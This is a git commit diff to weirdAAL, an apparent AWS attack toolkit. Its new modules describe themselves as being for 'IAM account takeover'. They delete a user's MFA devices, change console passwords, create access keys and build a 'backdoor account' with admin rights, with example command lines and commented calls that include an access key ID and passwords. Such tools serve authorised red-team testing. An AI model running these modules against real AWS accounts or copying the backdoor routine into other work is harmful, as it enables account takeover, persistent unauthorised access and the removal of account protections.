iam updates
This commit is contained in:
carnal0wnage
@@ -16,7 +16,7 @@ def module_iam_get_account_summary():
|
||||
iam_get_account_summary()
|
||||
|
||||
|
||||
def module_iam_list_users(*args):
|
||||
def module_iam_list_users():
|
||||
iam_list_users()
|
||||
|
||||
def module_iam_check_root_account():
|
||||
@@ -31,12 +31,23 @@ def module_iam_list_roles():
|
||||
def module_iam_list_policies():
|
||||
iam_list_policies()
|
||||
|
||||
#have to figure out the argument passing part here first
|
||||
def module_iam_list_user_policies():
|
||||
iam_list_user_policies( 'root')
|
||||
|
||||
def module_iam_list_attached_user_policies():
|
||||
iam_list_attached_user_policies( 'root')
|
||||
def module_iam_list_user_policies(*text):
|
||||
'''
|
||||
List user policies for specified user
|
||||
python3 weirdAAL.py -m iam_list_user_policies -a python -t yolo
|
||||
'''
|
||||
iam_list_user_policies(text[0][0])
|
||||
|
||||
def module_iam_list_entities_for_policy():
|
||||
iam_list_entities_for_policy('arn:aws:iam::xxxxxxx')
|
||||
def module_iam_list_attached_user_policies(*text):
|
||||
'''
|
||||
List attached user policies for specified user
|
||||
python3 weirdAAL.py -m iam_list_attached_user_policies -a python -t yolo
|
||||
'''
|
||||
iam_list_attached_user_policies(text[0][0])
|
||||
|
||||
def module_iam_list_entities_for_policy(*text):
|
||||
'''
|
||||
python3 weirdAAL.py -m iam_list_entities_for_policy -a 'arn:aws:iam::...' -t yolo
|
||||
'''
|
||||
iam_list_entities_for_policy(text[0][0])
|
||||
|
||||
@@ -1,18 +1,80 @@
|
||||
'''
|
||||
Functions specificially realted to IAM account takeover
|
||||
if you have root or IAM access gather user info, manipulate access keys or passwords, make backdoor account
|
||||
'''
|
||||
from libs.iam import *
|
||||
from libs.sts import *
|
||||
#from config import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY
|
||||
|
||||
|
||||
def module_iam_pwn():
|
||||
get_accountid()
|
||||
check_root_account()
|
||||
def module_iam_get_account_summary():
|
||||
'''
|
||||
Get account summmary for current user get_account_summary()
|
||||
'''
|
||||
iam_get_account_summary()
|
||||
|
||||
|
||||
def module_iam_check_root_account():
|
||||
'''
|
||||
runs get_account_summary, list_users, for each user list_login_profiles() & list_mfa_devices()
|
||||
'''
|
||||
check_root_account()
|
||||
|
||||
|
||||
def module_iam_get_password_policy():
|
||||
'''
|
||||
runs IAM get_account_password_policy for the current user
|
||||
'''
|
||||
get_password_policy()
|
||||
#create_access_key(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'pythons3')
|
||||
#delete_access_key(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'pythons3', 'AKIAIJV3RQMOYM7WQS2Q')
|
||||
#change_user_console_password(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, 'pythons3', 'PS#EDCasd123456!@')
|
||||
|
||||
|
||||
def module_iam_list_mfa_device(*text):
|
||||
'''
|
||||
List MFA device for specified user
|
||||
python3 weirdAAL.py -m iam_list_mfa_device -a python -t yolo
|
||||
'''
|
||||
iam_list_mfa_device(text[0][0])
|
||||
|
||||
|
||||
def module_iam_delete_mfa_device(*text):
|
||||
'''
|
||||
delete specified MFA device for specified user - username,serialnum
|
||||
python3 weirdAAL.py -m iam_delete_mfa_device -a 'python','arn:aws:iam::XXXXXXXXX:mfa/python' -t yolo
|
||||
'''
|
||||
iam_delete_mfa_device(text[0][0], text[0][1])
|
||||
|
||||
|
||||
def module_iam_change_user_console_password(*text):
|
||||
'''
|
||||
change the console password for the specied user
|
||||
python3 weirdAAL.py -m iam_change_user_console_password -a 'python','HackTh3Planet!' -t yolo
|
||||
'''
|
||||
iam_change_user_console_password(text[0][0], text[0][1])
|
||||
|
||||
|
||||
def module_iam_create_access_key(*text):
|
||||
'''
|
||||
create an access key for specfied user
|
||||
python3 weirdAAL.py -m iam_create_access_key -a 'python' -t yolo
|
||||
'''
|
||||
iam_create_access_key(text[0][0])
|
||||
|
||||
|
||||
def module_iam_delete_access_key(*text):
|
||||
'''
|
||||
delete the specified access key for a specified user username,accesskeyid
|
||||
python3 weirdAAL.py -m iam_delete_access_key -a 'python','AKIAEXAMPLEQ' -t yolo
|
||||
'''
|
||||
iam_delete_access_key(text[0][0], text[0][1])
|
||||
|
||||
#create_user(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'leethax')
|
||||
#make_admin(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'leethax')
|
||||
#make_backdoor_account(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,'leethax','PS#EDCasd123456!@')
|
||||
|
||||
def module_iam_make_backdoor_account(*text):
|
||||
'''
|
||||
calls the following functions:
|
||||
iam_create_user(username)
|
||||
iam_make_admin(username)
|
||||
iam_create_user_console_password(username, password)
|
||||
iam_create_access_key(username)
|
||||
'''
|
||||
iam_make_backdoor_account(text[0][0], text[0][1])
|
||||
|
||||
Reference in New Issue
Block a user